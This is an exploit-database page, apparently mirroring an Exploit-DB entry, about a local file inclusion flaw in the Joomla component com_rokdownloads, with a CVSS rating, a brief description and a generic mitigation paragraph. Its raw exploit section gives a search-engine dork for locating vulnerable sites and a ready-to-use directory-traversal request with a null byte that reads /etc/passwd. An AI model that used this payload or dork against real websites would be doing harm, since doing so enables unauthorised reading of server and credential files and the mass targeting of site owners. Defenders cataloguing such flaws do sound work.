header-logo
Suggest Exploit
vendor:
Joomla Component com_rokdownloads
by:
AtT4CKxT3rR0r1ST
7,5
CVSS
HIGH
Local File Inclusion
22
CWE
Product Name: Joomla Component com_rokdownloads
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Joomla Component com_rokdownloads Local File Inclusion

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable server. The attacker can use the ‘controller’ parameter to inject malicious code into the vulnerable application. For example, an attacker can send a request like www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00 to read the /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the application is not vulnerable to directory traversal attacks. The application should also validate user input and filter out any malicious characters.
Source

Exploit-DB raw data:

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Joomla Component com_rokdownloads
.:. Bug Type : Local File Inclusion [LFI]
.:. Dork : inurl:"com_rokdownloads"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_rokdownloads&controller=[LFI]
www.site.com/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00

####################################################################

Navigation

Suggest Exploit

Services By CQR